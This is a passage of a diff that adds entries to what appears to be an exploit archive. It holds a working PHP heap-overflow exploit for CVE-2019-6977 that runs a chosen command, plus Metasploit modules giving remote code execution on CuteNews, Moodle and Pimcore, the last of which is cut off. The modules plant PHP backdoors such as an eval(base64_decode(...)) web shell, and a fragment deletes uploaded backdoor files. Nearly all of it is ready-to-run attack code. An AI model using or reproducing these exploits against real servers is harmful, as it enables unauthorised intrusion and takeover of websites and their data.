+    client.shell_command_token("rm wp-content/uploads/#{@current_date}#{@filename1[0...10]}*")
+    client.shell_command_token("rm wp-content/uploads/#{@current_date}cropped-#{@filename1[0...10]}*")
+    client.shell_command_token("rm -r wp-content/uploads/#{@current_date}#{@filename1[0...10]}*")
+    client.shell_command_token("rm wp-content/themes/#{@current_theme}/cropped-#{@shell_name}.jpg")
+    client.shell_command_token("rm #{@backdoor}.php")
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/remote/46677.php b/exploits/php/remote/46677.php
new file mode 100644
index 000000000..f394d340e
--- /dev/null
+++ b/exploits/php/remote/46677.php
@@ -0,0 +1,343 @@
+<?php
+# imagecolormatch() OOB Heap Write exploit
+# https://bugs.php.net/bug.php?id=77270
+# CVE-2019-6977
+# Charles Fol
+# @cfreal_
+#
+# Usage: GET/POST /exploit.php?f=<system_addr>&c=<command>
+# Example: GET/POST /exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi
+#
+# Target: PHP 7.2.x
+# Tested on: PHP 7.2.12
+#
+
+/*
+
+buf = (unsigned long *)safe_emalloc(sizeof(unsigned long), 5 * im2->colorsTotal, 0);
+
+	for (x=0; x<im1->sx; x++) {
+		for( y=0; y<im1->sy; y++ ) {
+			color = im2->pixels[y][x];
+			rgb = im1->tpixels[y][x];
+			bp = buf + (color * 5);
+			(*(bp++))++;
+			*(bp++) += gdTrueColorGetRed(rgb);
+			*(bp++) += gdTrueColorGetGreen(rgb);
+			*(bp++) += gdTrueColorGetBlue(rgb);
+			*(bp++) += gdTrueColorGetAlpha(rgb);
+		}
+
+The buffer is written to by means of a color being the index:
+color = im2->pixels[y][x];
+..
+bp = buf + (color * 5);
+
+*/
+
+#
+# The bug allows us to increment 5 longs located after buf in memory.
+# The first long is incremented by one, others by an arbitrary value between 0
+# and 0xff.
+#
+
+error_reporting(E_ALL);
+define('OFFSET_STR_VAL', 0x18);
+define('BYTES_PER_COLOR', 0x28);
+
+
+class Nenuphar extends DOMNode
+{
+	# Add a property so that std.properties is created
+	function __construct()
+	{
+		$this->x = '1';
+	}
+
+	# Define __get
+	# => ce->ce_flags & ZEND_ACC_USE_GUARDS == ZEND_ACC_USE_GUARDS
+	# => zend_object_properties_size() == 0
+	# => sizeof(intern) == 0x50
+	function __get($x)
+	{
+		return $this->$x;
+	}
+}
+
+class Nenuphar2 extends DOMNode
+{
+	function __construct()
+	{
+		$this->x = '2';
+	}
+
+	function __get($x)
+	{
+		return $this->$x;
+	}
+}
+
+function ptr2str($ptr, $m=8)
+{
+	$out = "";
+    for ($i=0; $i<$m; $i++)
+    {
+        $out .= chr($ptr & 0xff);
+        $ptr >>= 8;
+    }
+    return $out;
+}
+
+function str2ptr(&$str, $p, $s=8)
+{
+	$address = 0;
+	for($j=$p+$s-1;$j>=$p;$j--)
+	{
+		$address <<= 8;
+		$address |= ord($str[$j]);
+	}
+	return $address;
+}
+
+# Spray stuff so that we get concurrent memory blocks
+for($i=0;$i<100;$i++)
+	${'spray'.$i} = str_repeat(chr($i), 2 * BYTES_PER_COLOR - OFFSET_STR_VAL);
+for($i=0;$i<100;$i++)
+	${'sprayx'.$i} = str_repeat(chr($i), 12 * BYTES_PER_COLOR - OFFSET_STR_VAL);
+
+#
+# #1: Address leak
+# We want to obtain the address of a string so that we can make
+# the Nenuphar.std.properties HashTable* point to it and hence control its
+# structure.
+#
+
+# We create two images $img1 and $img2, both of 1 pixel.
+# The RGB bytes of the pixel of $img1 will be added to OOB memory because we set
+# $img2 to have $nb_colors images and we set its only pixel to color number
+# $nb_colors.
+#
+$nb_colors = 12;
+$size_buf = $nb_colors * BYTES_PER_COLOR;
+
+# One pixel image so that the double loop iterates only once
+$img1 = imagecreatetruecolor(1, 1);
+
+# The three RGB values will be added to OOB memory
+# First value (Red) is added to the size of the zend_string structure which
+# lays under buf in memory.
+$color = imagecolorallocate($img1, 0xFF, 0, 0);
+imagefill($img1, 0, 0, $color);
+
+$img2 = imagecreate(1, 1);
+
+# Allocate $nb_colors colors: |buf| = $nb_colors * BYTES_PER_COLOR = 0x1e0
+# which puts buf in 0x200 memory blocks
+for($i=0;$i<$nb_colors;$i++)
+	imagecolorallocate($img2, 0, 0, $i);
+
+imagesetpixel($img2, 0, 0, $nb_colors + 1);
+
+# Create a memory layout as such:
+# [z:   zend_string: 0x200]
+# [x:   zend_string: 0x200]
+# [y:   zend_string: 0x200]
+$z = str_repeat('Z', $size_buf - OFFSET_STR_VAL);
+$x = str_repeat('X', $size_buf - OFFSET_STR_VAL);
+$y = str_repeat('Y', $size_buf - OFFSET_STR_VAL);
+
+# Then, we unset z and call imagecolormatch(); buf will be at z's memory
+# location during the execution
+# [buf: long[]     : 0x200]
+# [x:   zend_string: 0x200]
+# [y:   zend_string: 0x200]
+#
+# We can write buf + 0x208 + (0x08 or 0x10 or 0x18)
+# buf + 0x208 + 0x08 is X's zend_string.len
+unset($z);
+imagecolormatch($img1, $img2);
+
+# Now, $x's size has been increased by 0xFF, so we can read further in memory.
+#
+# Since buf was the last freed block, by unsetting y, we make its first 8 bytes
+# point to the old memory location of buf
+# [free:             0x200] <-+
+# [x:   zend_string: 0x200]   |
+# [free:             0x200] --+
+unset($y);
+# We can read those bytes because x's size has been increased
+$z_address = str2ptr($x, 488) + OFFSET_STR_VAL;
+
+# Reset both these variables so that their slot cannot be "stolen" by other
+# allocations
+$y = str_repeat('Y', $size_buf - OFFSET_STR_VAL - 8);
+
+# Now that we have z's address, we can make something point to it.
+# We create a fake HashTable structure in Z; when the script exits, each element
+# of this HashTable will be destroyed by calling ht->pDestructor(element)
+# The only element here is a string: "id"
+$z = 
+	# refcount
+	ptr2str(1) .
+	# u-nTableMask meth
+	ptr2str(0) .
+	# Bucket arData
+	ptr2str($z_address + 0x38) .
+	# uint32_t nNumUsed;
+	ptr2str(1, 4) .
+    # uint32_t nNumOfElements;
+	ptr2str(1, 4) .
+	# uint32_t nTableSize
+	ptr2str(0, 4) .
+	# uint32_t nInternalPointer
+	ptr2str(0, 4) .
+	# zend_long nNextFreeElement
+	ptr2str(0x4242424242424242) .
+	# dtor_func_t pDestructor
+	ptr2str(hexdec($_REQUEST['f'])) .
+	str_pad($_REQUEST['c'], 0x100, "\x00") .
+	ptr2str(0, strlen($y) - 0x38 - 0x100);
+;
+
+# At this point we control a string $z and we know its address: we'll make an
+# internal PHP HashTable structure point to it.
+
+
+#
+# #2: Read Nenuphar.std.properties
+#
+
+# The tricky part here was to find an interesting PHP structure that is
+# allocated in the same fastbins as buf, so that we can modify one of its
+# internal pointers. Since buf has to be a multiple of 0x28, I used dom_object,
+# whose size is 0x50 = 0x28 * 2. Nenuphar is a subclass of dom_object with just
+# one extra method, __get().
+# php_dom.c:1074: dom_object *intern = ecalloc(1, sizeof(dom_object) + zend_object_properties_size(class_type));
+# Since we defined a __get() method, zend_object_properties_size(class_type) = 0
+# and not -0x10.
+#
+# zend_object.properties points to an HashTable. Controlling an HashTable in PHP
+# means code execution since at the end of the script, every element of an HT is
+# destroyed by calling ht.pDestructor(ht.arData[i]).
+# Hence, we want to change the $nenuphar.std.properties pointer.
+#
+# To proceed, we first read $nenuphar.std.properties, and then increment it
+# by triggering the bug several times, until
+# $nenuphar.std.properties == $z_address
+#
+# Sadly, $nenuphar.std.ce will also get incremented by one every time we trigger
+# the bug. This is due to (*(bp++))++ (in gdImageColorMatch).
+# To circumvent this problem, we create two classes, Nenuphar and Nenuphar2, and
+# instanciate them as $nenuphar and $nenuphar2. After we're done changing the
+# std.properties pointer, we trigger the bug more times, until
+# $nenuphar.std.ce == $nenuphar2.std.ce2
+#
+# This way, $nenuphar will have an arbitrary std.properties pointer, and its
+# std.ce will be valid.
+#
+# Afterwards, we let the script exit, which will destroy our fake hashtable (Z),
+# and therefore call our arbitrary function.
+#
+
+# Here we want fastbins of size 0x50 to match dom_object's size
+$nb_colors = 2;
+$size_buf = $nb_colors * BYTES_PER_COLOR;
+
+$img1 = imagecreatetruecolor(1, 1);
+# The three RGB values will be added to OOB memory
+# Second value (Green) is added to the size of the zend_string structure which
+# lays under buf in memory.
+$color = imagecolorallocate($img1, 0, 0xFF, 0);
+imagefill($img1, 0, 0, $color);
+
+# Allocate 2 colors so that |buf| = 2 * 0x28 = 0x50
+$img2 = imagecreate(1, 1);
+for($i=0;$i<$nb_colors;$i++)
+	imagecolorallocate($img2, 0, 0, $i);
+
+$y = str_repeat('Y', $size_buf - OFFSET_STR_VAL - 8);
+$x = str_repeat('X', $size_buf - OFFSET_STR_VAL - 8);
+$nenuphar = new Nenuphar();
+$nenuphar2 = new Nenuphar2();
+
+imagesetpixel($img2, 0, 0, $nb_colors);
+
+# Unsetting the first string so that buf takes its place
+unset($y);
+
+# Trigger the bug: $x's size is increased by 0xFF
+imagecolormatch($img1, $img2);
+
+$ce1_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + 0x28);
+$ce2_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + $size_buf + 0x28);
+$props_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + 0x38);
+
+print('Nenuphar.ce: 0x' . dechex($ce1_address) . "\n");
+print('Nenuphar2.ce: 0x' . dechex($ce2_address) . "\n");
+print('Nenuphar.properties: 0x' . dechex($props_address) . "\n");
+print('z.val: 0x' . dechex($z_address) . "\n");
+print('Difference: 0x' . dechex($z_address-$props_address) . "\n");
+
+if(
+	$ce2_address - $ce1_address < ($z_address-$props_address) / 0xff ||
+	$z_address - $props_address < 0
+)
+{
+	print('That won\'t work');
+	exit(0);
+}
+
+
+#
+# #3: Modifying Nenuphar.std.properties and Nenuphar.std.ce
+#
+
+# Each time we increment Nenuphar.properties by an arbitrary value, ce1_address
+# is also incremented by one because of (*(bp++))++;
+# Therefore after we're done incrementing props_address to z_address we need
+# to increment ce1's address one by one until Nenuphar1.ce == Nenuphar2.ce
+
+# The memory structure we have ATM is OK. We can just trigger the bug again
+# until Nenuphar.properties == z_address
+
+$color = imagecolorallocate($img1, 0, 0xFF, 0);
+imagefill($img1, 0, 0, $color);
+imagesetpixel($img2, 0, 0, $nb_colors + 3);
+
+for($current=$props_address+0xFF;$current<=$z_address;$current+=0xFF)
+{
+	imagecolormatch($img1, $img2);
+	$ce1_address++;
+}
+
+$color = imagecolorallocate($img1, 0, $z_address-$current+0xff, 0);
+imagefill($img1, 0, 0, $color);
+$current = imagecolormatch($img1, $img2);
+$ce1_address++;
+
+# Since we don't want to touch other values, only increase the first one, we set
+# the three colors to 0
+$color = imagecolorallocate($img1, 0, 0, 0);
+imagefill($img1, 0, 0, $color);
+
+# Trigger the bug once to increment ce1 by one.
+while($ce1_address++ < $ce2_address)
+{
+	imagecolormatch($img1, $img2);
+}
+
+# Read the string again to see if we were successful
+
+$new_ce1_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + 0x28);
+$new_props_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + 0x38);
+
+if($new_ce1_address == $ce2_address && $new_props_address == $z_address)
+{
+	print("\nExploit SUCCESSFUL !\n");
+}
+else
+{
+	print('NEW Nenuphar.ce: 0x' . dechex($new_ce1_address) . "\n");
+	print('NEW Nenuphar.std.properties: 0x' . dechex($new_props_address) . "\n");
+	print("\nExploit FAILED !\n");
+}
\ No newline at end of file
diff --git a/exploits/php/remote/46698.rb b/exploits/php/remote/46698.rb
new file mode 100755
index 000000000..2471ac3ec
--- /dev/null
+++ b/exploits/php/remote/46698.rb
@@ -0,0 +1,181 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+ 
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "CuteNews 2.1.2 - 'avatar' Remote Code Execution",
+      'Description' => %q(
+        This module exploits a command execution vulnerability in CuteNews prior to 2.1.2.
+        The attacker can infiltrate the server through the avatar upload process in the profile area.
+        There is no realistic control of the $imgsize function in "/core/modules/dashboard.php"
+        Header content of the file can be changed and the control can be bypassed.
+        We can use the "GIF" header for this process.
+        An ordinary user is enough to exploit the vulnerability. No need for admin user.
+        The module creates a file for you and allows RCE.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
+        ],
+      'References' =>
+        [
+          ['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html']
+          ['URL', 'http://cutephp.com'] # Official Website
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' => [['Automatic', {}]],
+      'Privileged' => false,
+      'DisclosureDate' => "Apr 14 2019",
+      'DefaultTarget' => 0))
+ 
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base CutePHP directory path", '/CuteNews']),
+        OptString.new('USERNAME', [true, "Username to authenticate with", 'admin']),
+        OptString.new('PASSWORD', [false, "Password to authenticate with", 'admin'])
+      ]
+    )
+  end
+
+  def exec
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "uploads","avatar_#{datastore['USERNAME']}_#{@shell}") # shell url
+    })
+  end
+##
+# Login and cookie information gathering
+##
+ 
+  def login(uname, pass, check)
+    # 1st request to get cookie
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_post' => {
+        'action' => 'dologin',
+        'username' => uname,
+        'password' => pass
+      }
+    )
+
+    cookie = res.get_cookies
+    # 2nd request to cookie validation
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "index.php"),
+      'cookie'   => cookie
+    })
+ 
+    if res.code = 200 && (res.body =~ /dashboard/)
+      return cookie     
+    end 
+
+    fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}")
+    return nil
+  end
+ 
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+##
+# Upload malicious file // payload integration
+##
+  def upload_shell(cookie, check)
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "index.php?mod=main&opt=personal"),
+      'cookie'   => cookie
+    })
+
+    signkey = res.body.split('__signature_key" value="')[1].split('"')[0]
+    signdsi = res.body.split('__signature_dsi" value="')[1].split('"')[0]
+    # data preparation
+    fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
+    @shell = "#{fname}"
+    pdata = Rex::MIME::Message.new
+    pdata.add_part('main', nil, nil, 'form-data; name="mod"')
+    pdata.add_part('personal', nil, nil, 'form-data; name="opt"')
+    pdata.add_part("#{signkey}", nil, nil, 'form-data; name="__signature_key"')
+    pdata.add_part("#{signdsi}", nil, nil, 'form-data; name="__signature_dsi"')
+    pdata.add_part('', nil, nil, 'form-data; name="editpassword"')
+    pdata.add_part('', nil, nil, 'form-data; name="confirmpassword"')
+    pdata.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="editnickname"')
+    pdata.add_part("GIF\r\n" + payload.encoded, 'image/png', nil, "form-data; name=\"avatar_file\"; filename=\"#{fname}\"")
+    pdata.add_part('', nil, nil, 'form-data; name="more[site]"')
+    pdata.add_part('', nil, nil, 'form-data; name="more[about]"')
+    data = pdata.to_s
+ 
+    res = send_request_cgi({
+      'method' => 'POST',    
+      'data'  => data,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, "index.php")     
+    })
+
+    if res && res.code == 200 && res.body =~ /User info updated!/
+      print_status("Trying to upload #{fname}")
+      return true
+    else
+      fail_with(Failure::NoAccess, 'Error occurred during uploading!')
+      return false
+    end
+
+  end
+##
+# Exploit controls and information
+##
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+
+    cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
+    print_good("Authentication was successful with user: #{datastore['USERNAME']}")
+
+    if upload_shell(cookie, true)
+      print_good("Upload successfully.")
+      exec
+    end
+  end
+##
+# Version and Vulnerability Check
+##
+  def check
+ 
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "index.php")
+    })
+ 
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+ 
+    if res.code == 200
+      version = res.body.split('target="_blank">CuteNews ')[1].split('</a>')[0]
+      if version < '2.1.3'
+       print_status("#{peer} - CuteNews is #{version}")
+       return Exploit::CheckCode::Vulnerable
+      end
+    end
+ 
+    return Exploit::CheckCode::Safe
+  end
+end
+##
+# The end of the adventure (o_O) // AkkuS
+##
\ No newline at end of file
diff --git a/exploits/php/remote/46775.rb b/exploits/php/remote/46775.rb
new file mode 100755
index 000000000..da02de324
--- /dev/null
+++ b/exploits/php/remote/46775.rb
@@ -0,0 +1,223 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+ 
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "Moodle 3.6.3 - 'Install Plugin' Remote Command Execution",
+      'Description' => %q(
+        This module exploits a command execution vulnerability in Moodle 3.6.3.
+        An attacker can upload malicious file using the plugin installation area.
+        Plugins must be hosted accommodate "version.php" and "theme_{plugin name}.php" files.
+        After routine check, the moodle will accept the appropriate plugin file.
+        Plugin control can be bypassed and malicious code can be placed in the files contained in the plugin.
+        The module receives a shell session from the server by placing malicious code in the language file.
+
+        You must have an admin account to exploit this vulnerability.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+        ],
+      'References' =>
+        [
+          ['URL', 'http://pentest.com.tr/exploits/Moodle-3-6-3-Install-Plugin-Remote-Command-Execution.html'],
+          ['URL', 'https://moodle.org']
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' => [['Automatic', {}]],
+      'Privileged' => false,
+      'DisclosureDate' => "Apr 28 2019",
+      'DefaultTarget' => 0))
+ 
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base Moodle directory path", '/']),
+        OptString.new('USERNAME', [true, "Admin username to authenticate with", 'admin']),
+        OptString.new('PASSWORD', [false, "Admin password to authenticate with", 'admin'])
+      ]
+    )
+  end
+
+  def create_plugin_file
+    # There are syntax errors in creating zip file. So the payload was sent as base64.
+    plugin_file      = Rex::Zip::Archive.new
+    @header       = Rex::Text.rand_text_alpha_upper(4)
+    @plugin_name  = Rex::Text.rand_text_alpha_lower(7)
+
+    path = "#{@plugin_name}/version.php"
+    path2 = "#{@plugin_name}/lang/en/theme_#{@plugin_name}.php"
+    # "$plugin->version" and "$plugin->component" contents are required to accept Moodle plugin.
+    plugin_file.add_file(path, "<?php $plugin->version = 2018121704; $plugin->component = 'theme_#{@plugin_name}';")
+    plugin_file.add_file(path2, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
+    plugin_file.pack
+
+  end
+
+  def exec_code(cookie)
+    handler
+    # Base64 was encoded in "PHP". This process was sent as "HTTP headers".
+    send_request_cgi({
+      'method' => 'GET',
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, "theme", @plugin_name, "lang", "en", "theme_#{@plugin_name}.php"),
+      'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
+    })
+
+  end
+
+  def upload(cookie)
+    # The beginning of the adventure o_O
+    print_status("Plugin zip file is being created and loaded...")
+    res = send_request_cgi(
+      'method' => 'GET',
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, 'admin', 'tool', 'installaddon', 'index.php')
+    )
+
+    @sesskey = res.body.split('"sesskey":"')[1].split('"')[0] # fetch session info
+    @itemid = res.body.split('amp;itemid=')[1].split('&')[0] # fetch item for upload
+    @author = res.body.split('title="View profile">')[1].split('<')[0] # fetch admin account profile info
+    @clientid = res.body.split('client_id":"')[1].split('"')[0] # fetch client info
+    
+    # creating multipart data for the upload plugin file
+    pdata = Rex::MIME::Message.new
+    pdata.add_part(create_plugin_file, 'application/zip', nil, "form-data; name=\"repo_upload_file\"; filename=\"#{@plugin_name}.zip\"")
+    pdata.add_part('', nil, nil, 'form-data; name="title"')
+    pdata.add_part(@author, nil, nil, 'form-data; name="author"')
+    pdata.add_part('allrightsreserved', nil, nil, 'form-data; name="license"')
+    pdata.add_part(@itemid, nil, nil, 'form-data; name="itemid"')
+    pdata.add_part('.zip', nil, nil, 'form-data; name="accepted_types[]"')
+    pdata.add_part('4', nil, nil, 'form-data; name="repo_id"')
+    pdata.add_part('', nil, nil, 'form-data; name="p"')
+    pdata.add_part('', nil, nil, 'form-data; name="page"')
+    pdata.add_part('filepicker', nil, nil, 'form-data; name="env"')
+    pdata.add_part(@sesskey, nil, nil, 'form-data; name="sesskey"')
+    pdata.add_part(@clientid, nil, nil, 'form-data; name="client_id"')
+    pdata.add_part('-1', nil, nil, 'form-data; name="maxbytes"')
+    pdata.add_part('-1', nil, nil, 'form-data; name="areamaxbytes"')
+    pdata.add_part('1', nil, nil, 'form-data; name="ctx_id"')
+    pdata.add_part('/', nil, nil, 'form-data; name="savepath"')
+    data = pdata.to_s
+ 
+    res = send_request_cgi({
+      'method' => 'POST',    
+      'data'  => data,
+      'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, 'repository', 'repository_ajax.php?action=upload')     
+    })
+
+    if res.body =~ /draftfile.php/
+      print_good("Plugin #{@plugin_name}.zip file successfully uploaded to target!")
+      print_status("Attempting to integrate the plugin...")
+      @zipfile = res.body.split('draft\/')[1].split('\/')[0]
+      plugin_integration(cookie)
+    else
+      fail_with(Failure::NoAccess, "Something went wrong!")
+    end
+  end
+
+  def plugin_integration(cookie)
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'tool', 'installaddon', 'index.php'),
+      'cookie'   => cookie,
+      'vars_post' => {
+        'sesskey' => @sesskey,
+        '_qf__tool_installaddon_installfromzip_form' => '1',
+        'mform_showmore_id_general' => '0',
+        'mform_isexpanded_id_general' => '1',
+        'zipfile' => @zipfile,
+        'plugintype' => 'theme',
+        'rootdir' => '',
+        'submitbutton' => 'Install+plugin+from+the+ZIP+file'
+      }
+    )
+
+    if res.body =~ /installzipstorage/
+      print_good("Plugin successfully integrated!")
+      storage = res.body.split('installzipstorage=')[1].split('&')[0]
+
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'admin', 'tool', 'installaddon', 'index.php'),
+        'cookie'   => cookie,
+        'vars_post' => {
+          'installzipcomponent' => "theme_#{@plugin_name}",
+          'installzipstorage' => storage,
+          'installzipconfirm' => '1',
+          'sesskey' => @sesskey
+        }
+      )
+      exec_code(cookie)
+
+    else
+      fail_with(Failure::NoAccess, "Something went wrong!")
+    end
+  end
+ 
+  def login(uname, pass)
+    # 1st request to get MoodleSession and LoginToken
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login', 'index.php')
+    )
+    cookie = res.get_cookies
+    token = res.body.split('logintoken" value="')[1].split('"')[0]
+
+    # 2nd request to login validation
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login', 'index.php'),
+      'cookie'   => cookie,
+      'vars_post' => {
+        'anchor' => '',
+        'logintoken' => token,
+        'username' => uname,
+        'password' => pass
+      }
+    )
+
+    cookie = res.get_cookies
+    location = res.redirection.to_s
+    if res and res.code = 303 && location.include?('testsession')
+      return cookie     
+    end 
+
+    fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}")
+    return nil
+  end
+
+  def check 
+    # Basic check 
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'lib', 'upgrade.txt')
+    )
+
+    if res && res.code == 200 && res.body =~ /=== 3.7/
+      return Exploit::CheckCode::Safe
+    else
+      return Exploit::CheckCode::Appears
+    end 
+  end
+ 
+  def exploit
+    cookie = login(datastore['USERNAME'], datastore['PASSWORD'])
+    print_good("Authentication was successful with user: #{datastore['USERNAME']}")
+    upload(cookie) # start the adventure
+  end
+##
+# The end of the adventure (o_O) // AkkuS
+##
+end
\ No newline at end of file
diff --git a/exploits/php/remote/46783.rb b/exploits/php/remote/46783.rb
new file mode 100755
index 000000000..cd28210a6
--- /dev/null
+++ b/exploits/php/remote/46783.rb
@@ -0,0 +1,273 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "Pimcore Unserialize RCE",
+      'Description' => %q(
+        This module exploits a PHP unserialize() in Pimcore before 5.7.1 to
+        execute arbitrary code. An authenticated user with "classes" permission
+        could exploit the vulnerability.
+
+        The vulnerability exists in the "ClassController.php" class, where the
+        "bulk-commit" method makes it possible to exploit the unserialize function
+        when passing untrusted values in "data" parameter.
+
+        Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.5.4, 5.6.0-5.6.6 with the Symfony
+        unserialize payload.
+
+        Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Daniele Scanu', # Discovery & PoC
+          'Fabio Cogno' # Metasploit module
+        ],
+      'References' =>
+        [
+          ['CVE', '2019-10867'],
+          ['URL', 'https://github.com/pimcore/pimcore/commit/38a29e2f4f5f060a73974626952501cee05fda73'],
+          ['URL', 'https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-173998']
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' =>
+        [
+          ['Pimcore 5.x (Symfony unserialize payload)', 'type' => :symfony],
+          ['Pimcore 4.x (Zend unserialize payload)', 'type' => :zend]
+        ],
+      'Payload' => {
+        'Space' => 8000,
+        'DisableNops' => true
+      },
+      'Privileged' => false,
+      'DisclosureDate' => "Mar 11 2019",
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base Pimcore directory path", '/']),
+        OptString.new('USERNAME', [true, "Username to authenticate with", '']),
+        OptString.new('PASSWORD', [false, "Password to authenticate with", ''])
+      ]
+    )
+  end
+
+  def login
+    # Try to login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login', 'login'),
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    if res.code == 302 && res.headers['Location'] =~ /\/admin\/\?_dc=/
+      print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+
+      # Grabbing CSRF token and PHPSESSID cookie
+      return grab_csrftoken(res)
+    end
+
+    if res.code == 302 && res.headers['Location'] =~ /auth_failed=true/
+      fail_with(Failure::NoAccess, 'Invalid credentials')
+    end
+
+    fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+  end
+
+  def grab_csrftoken(auth_res)
+    uri = "#{target_uri.path}admin/?_dc=#{auth_res.headers['Location'].scan(/\/admin\/\?_dc=([0-9]+)/).flatten.first}"
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(uri),
+      'cookie' => auth_res.get_cookies
+    )
+
+    if res && res.code == 200
+      # Pimcore 5.x
+      unless res.body.scan(/"csrfToken": "[a-z0-9]+",/).empty?
+        @csrf_token = res.body.scan(/"csrfToken": "([a-z0-9]+)",/).flatten.first.to_s
+        @pimcore_cookies = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+;)/).flatten[0]
+        fail_with(Failure::NotFound, 'Failed to retrieve cookies') unless @pimcore_cookies
+        @pimcore_cookies << " pimcore_admin_sid=1;"
+
+        # Version
+        version = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[0]
+        build = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[1]
+        fail_with(Failure::NotFound, 'Failed to retrieve the version and build') unless version && build
+        print_version(version, build)
+        return assign_target(version)
+      end
+
+      # Pimcore 4.x
+      unless res.body.scan(/csrfToken: "[a-z0-9]+",/).empty?
+        @csrf_token = res.body.scan(/csrfToken: "([a-z0-9]+)",/).flatten.first.to_s
+        @pimcore_cookies = res.get_cookies.scan(/(pimcore_admin_sid=[a-z0-9]+;)/).flatten[0]
+        fail_with(Failure::NotFound, 'Unable to retrieve cookies') unless @pimcore_cookies
+
+        # Version
+        version = res.body.scan(/version: "([0-9]{1}\.[0-9]{1}\.[0-9]{1})",/i).flatten[0]
+        build = res.body.scan(/build: "([0-9]+)",/i).flatten[0]
+        fail_with(Failure::NotFound, 'Failed to retrieve the version and build') unless version && build
+        print_version(version, build)
+        return assign_target(version)
+      end
+
+      # Version different from 4.x or 5.x
+      return nil
+    else
+      fail_with(Failure::NoAccess, 'Failed to grab csrfToken and PHPSESSID')
+    end
+  end
+
